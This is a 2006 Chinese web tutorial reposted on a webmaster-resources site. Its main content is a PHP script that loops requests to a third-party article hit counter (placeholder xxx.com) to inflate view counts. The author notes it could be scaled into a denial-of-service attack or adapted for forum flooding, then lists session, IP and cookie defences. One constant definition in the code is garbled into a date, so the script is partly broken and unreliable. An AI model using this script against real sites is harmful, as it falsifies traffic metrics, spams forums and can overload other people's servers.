中国站长下载-为中国站长提供最好最全的建站资源! 首 页发布资源有事留言繁體中文
设为首页
加入收藏
联系我们
 
您当前的位置:中国站长下载 -> 文章中心 -> 网页编程 -> PHP编程 -> 文章内容  虚拟主机 域名注册 退出登录 用户管理
栏目导航
· ASP编程 · .NET编程
· PHP编程 · JSP编程
· CGI 专区
热门文章
· sndvol32 - sndvol3...
· [组图] FLASH:《大话李白》...
· 个人网站到底能赚多...
· [图文] Rundll.exe是病毒吗...
· [组图] Flash:制作MV
· 价值12万元的网站SE...
· 网站创业者,你需要...
· 一个成功的网站设计...
· [图文] FLASH:韩国导航条解...
· 中国网站的赚钱模式...
相关文章
· 用php实现广告轮播
· 一个用PHP实现的UBB...
· PHP实现简单线性回归...
· 还是说php实现singl...
· 用php实现gb2312和u...
· 用php实现gb2312和u...
· PHP实现简单线性回归...
· PHP实现简单线性回归...
· PHP实现简单线性回归...
· PHP实现简单线性回归...
PHP实现自动刷数和“灌水”机
作者:不详  来源:不详  发布时间:2006-8-14 10:12:05  发布人:chinazhan

 减小字体 增大字体

     今天无意间看到一个网站,它的计数器能够在静态页里更新,我想,应该是使用js来做的,打开源代码一看,果然是:
  
  <div align=center><SPAN class=Article_tdbgall>
  作者:未知 文章来源:Meidi.Net
  点击数:
  <script language=’javascript’ src=’/Article/GetHits.asp?ArticleID=759’></script>
  更新时间:2005-5-27</SPAN>
  </div>
  
    点击数后面是一个asp文件去处理的,那么我打开这个文件看看:
  
  document.write(’210’);
  
    是吧,就是GetHists.asp文件处理ArticleID后提取结果后输出次数:document.write(’次数’),再静态页里就能够直接引用了。
  
    坏人终究是坏人,那么我就想,如何能够迅速提升点击数呢?手工刷新的话不是很类,恩,赶紧写个PHP程序来自动的去访问这个文件。
  
    PHP代码如下:
  
  <?php
  /* access_url.php */
  define(SUM, 1000); //需要访问的次数
  define(L_TIME, 1000); //强制脚本执行的时间
  define(2005-10-4, 1); //每次访问之间休眠的时间
  $url = "http://www.xxx.com/Article/GetHits.asp?ArticleID=759"; //需要访问的地址
  set_time_limit(L_TIME);
  
  //访问指定URL函数knowsky.com
  function access_url($url)
  {
   if ($url==’’) return false;
   $fp = fopen($url, ’r’) or exit(’Open url faild!’);
   if ($fp) {
    while (!feof($fp)) {
     $file = fgets($fp);
     echo $file."\n<p> </p>\n";
    }
    unset($file);
   }
  }
  
  //进行测试
  for ($i=0; $i<SUM; $i++) {
   access_url($url);
   sleep(2005-10-4);
  }
  ?>
  
    运行上面的程序,那么就会连续访问指定的URL地址,那么自然这个访问次数就会连续增加,达到灌水的效果。如果是流量大,而且用多程序去运行的话,那么很容易就会达到拒绝服务(DoS)的效果了。如果对方的防范措施,把代码修改一下针对论坛进行提交,很容易实现论坛灌水的效果。
  
    防范方法:
  
    1. 代码中使用Session机制,当用户提交的时候生成一个Session ID,提交内容的时候判断是否已经提交,如果已提交那么就不允许刷。
  
    2. 当用户提交以后记录用户的IP地址,如果指定时间内再提交的话就不允许再提交。
  
    3. 当用户提交内容以后,在用户客户端写入Cookie,如果用户再次提交先检查客户端是否有Cookie来确定是否允许提交。
  
    还有很多其他方法,可以去搜索一下,或者发挥自己的想象力,做的更好。
  
  
    做人要厚道,请注明转自chinazhan中国站长(www.ChinaZhan.com)。

 
[] [返回上一页] [打 印] [收 藏]
∷相关文章评论∷    (评论内容只代表网友观点,与本站立场无关!) [更多评论...]
中国站长下载
中国站长下载

本页只接受PR>=4 IT类站点连接,申请连接,谢谢您们的支持!希望我们的下载站能够真正帮到中国的站长们!
关于本站 - 网站帮助 - 广告合作 - 下载声明 - 友情连接 - 网站地图
Copyright © 2005-2006 ChinaZhan.Net. All Rights Reserved .